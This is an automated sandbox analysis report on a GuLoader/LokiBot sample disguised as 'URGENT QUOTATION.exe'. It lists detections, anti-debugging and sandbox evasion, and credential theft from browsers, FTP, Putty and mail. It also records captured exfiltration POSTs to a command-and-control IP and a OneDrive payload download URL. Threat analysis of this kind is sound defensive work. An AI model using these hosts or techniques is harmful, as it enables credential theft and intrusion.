Loading ...

Play interactive tourEdit tour

Analysis Report URGENT QUOTATION.exe

Overview

General Information

Sample Name:URGENT QUOTATION.exe
Analysis ID:356236
MD5:b49c71be94624173a9683580c792b195
SHA1:4b78a8199129007580b91060db70ce44fe7278e5
SHA256:8cf8f18fb85f0e190ff77fd57264cf9e31dd7128f1b4ad43713e128a6d68e867
Tags:GuLoader

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • URGENT QUOTATION.exe (PID: 6160 cmdline: 'C:\Users\user\Desktop\URGENT QUOTATION.exe' MD5: B49C71BE94624173A9683580C792B195)
    • URGENT QUOTATION.exe (PID: 6792 cmdline: 'C:\Users\user\Desktop\URGENT QUOTATION.exe' MD5: B49C71BE94624173A9683580C792B195)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
    Process Memory Space: URGENT QUOTATION.exe PID: 6160JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
      Process Memory Space: URGENT QUOTATION.exe PID: 6160JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
        Process Memory Space: URGENT QUOTATION.exe PID: 6792JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
          Process Memory Space: URGENT QUOTATION.exe PID: 6792JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for domain / URLShow sources
            Source: http://51.195.53.221/p.php/594QbwaP456ANVirustotal: Detection: 10%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: URGENT QUOTATION.exeVirustotal: Detection: 28%Perma Link
            Source: URGENT QUOTATION.exeReversingLabs: Detection: 48%
            Machine Learning detection for sampleShow sources
            Source: URGENT QUOTATION.exeJoe Sandbox ML: detected

            Compliance:

            barindex
            Uses 32bit PE filesShow sources
            Source: URGENT QUOTATION.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49743 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49743 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49743 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49743 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024312 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 192.168.2.4:49744 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49744 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49744 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024317 ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 192.168.2.4:49744 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49745 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49745 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49745 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49745 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49748 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49748 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49748 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49748 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49749 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49749 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49749 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49749 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.4:49750 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.4:49750 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.4:49750 -> 51.195.53.221:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.4:49750 -> 51.195.53.221:80
            Source: Joe Sandbox ViewIP Address: 51.195.53.221 51.195.53.221
            Source: Joe Sandbox ViewASN Name: OVHFR OVHFR
            Source: global trafficHTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 190Connection: close
            Source: global trafficHTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 190Connection: close
            Source: global trafficHTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 163Connection: close
            Source: global trafficHTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 163Connection: close
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownTCP traffic detected without corresponding DNS query: 51.195.53.221
            Source: unknownDNS traffic detected: queries for: onedrive.live.com
            Source: unknownHTTP traffic detected: POST /p.php/594QbwaP456AN HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 51.195.53.221Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 244CE878Content-Length: 190Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 22 Feb 2021 18:55:26 GMTServer: ApacheConnection: closeContent-Type: text/html; charset=UTF-8
            Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
            Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: URGENT QUOTATION.exe, 00000004.00000002.711543447.000000001E174000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: URGENT QUOTATION.exe, 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=604AA6C584DB9137&resid=604AA6C584DB9137%21123&authkey=ANCFnep

            System Summary:

            barindex
            Initial sample is a PE file and has a suspicious nameShow sources
            Source: initial sampleStatic PE information: Filename: URGENT QUOTATION.exe
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021853EC NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218613D NtSetInformationThread,NtMapViewOfSection,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02185CF0 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021804E7 EnumWindows,NtSetInformationThread,NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186210 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186239 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186263 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186281 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186315 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218633D NtMapViewOfSection,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186328 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186353 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186387 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218182B NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182822 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182873 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021820B4 NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021828CA NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218290F NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186145 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218216A NtSetInformationThread,NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186161 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186197 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021861B5 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021861F5 NtMapViewOfSection,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02180602 NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182605 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218063F NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182666 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182689 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021826B2 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021826F9 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182727 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182773 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021827A3 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218247B NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021824D3 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021824EB NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021814E5 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182523 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218058F NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182581 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021825B7 NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021805AB NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021805CD NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021845FA NtSetInformationThread,NtWriteVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00565CF0 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562CB0 Sleep,NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_0056216A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,LdrInitializeThunk,NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_0056210E TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_0056613D NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562DB2 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005620B4 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562D5B NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562144 LdrInitializeThunk,NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566145 NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_0056217B NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566161 NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562117 TerminateThread,LdrInitializeThunk,NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562D26 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562D29 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005661F5 NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005621EF NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562D96 LdrInitializeThunk,NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566197 NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562D99 LdrInitializeThunk,NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005621B5 NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_005661B5 NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562DBB LdrInitializeThunk,NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562E46 LdrInitializeThunk,NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566263 NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566210 NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562E0F LdrInitializeThunk,NtProtectVirtualMemory,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566239 NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566281 NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566353 NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566315 NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_0056633D NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566328 NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00566387 NtSetInformationThread,
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 4_2_00562F0F
            Source: URGENT QUOTATION.exe, 00000000.00000000.646889990.000000000043B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameconstantinsborg.exe vs URGENT QUOTATION.exe
            Source: URGENT QUOTATION.exe, 00000000.00000002.674117945.0000000002140000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs URGENT QUOTATION.exe
            Source: URGENT QUOTATION.exe, 00000004.00000002.711483674.000000001DD80000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs URGENT QUOTATION.exe
            Source: URGENT QUOTATION.exe, 00000004.00000002.711498445.000000001DED0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs URGENT QUOTATION.exe
            Source: URGENT QUOTATION.exe, 00000004.00000000.671322005.000000000043B000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameconstantinsborg.exe vs URGENT QUOTATION.exe
            Source: URGENT QUOTATION.exeBinary or memory string: OriginalFilenameconstantinsborg.exe vs URGENT QUOTATION.exe
            Source: URGENT QUOTATION.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/2@2/1
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeMutant created: \Sessions\1\BaseNamedObjects\8F9C4E9C79A3B52B3F739430
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile created: C:\Users\user\AppData\Local\Temp\~DFBD8596DEFB17F0B4.TMPJump to behavior
            Source: URGENT QUOTATION.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: URGENT QUOTATION.exeVirustotal: Detection: 28%
            Source: URGENT QUOTATION.exeReversingLabs: Detection: 48%
            Source: unknownProcess created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'
            Source: unknownProcess created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeProcess created: C:\Users\user\Desktop\URGENT QUOTATION.exe 'C:\Users\user\Desktop\URGENT QUOTATION.exe'
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000004.00000002.707855698.0000000000562000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: URGENT QUOTATION.exe PID: 6160, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: URGENT QUOTATION.exe PID: 6792, type: MEMORY
            Yara detected VB6 Downloader GenericShow sources
            Source: Yara matchFile source: Process Memory Space: URGENT QUOTATION.exe PID: 6160, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: URGENT QUOTATION.exe PID: 6792, type: MEMORY
            Source: URGENT QUOTATION.exeStatic PE information: real checksum: 0x29a19 should be: 0x2d90a
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218321F push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218020B push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02185A39 push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218223D push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218023F push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02181A31 push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02180227 push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218525B push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218024B push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218527B push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02185A7B push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218127F push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218526F push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02186261 push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182A63 push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_0218129D push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02180297 push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02180287 push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021802B9 push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02182AAF push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021802A3 push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_02184AA5 push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021852A5 push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021832DB push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021802D7 push ebx; iretd
            Source: C:\Users\user\Desktop\URGENT QUOTATION.exeCode function: 0_2_021842C9 push ebx; iretd
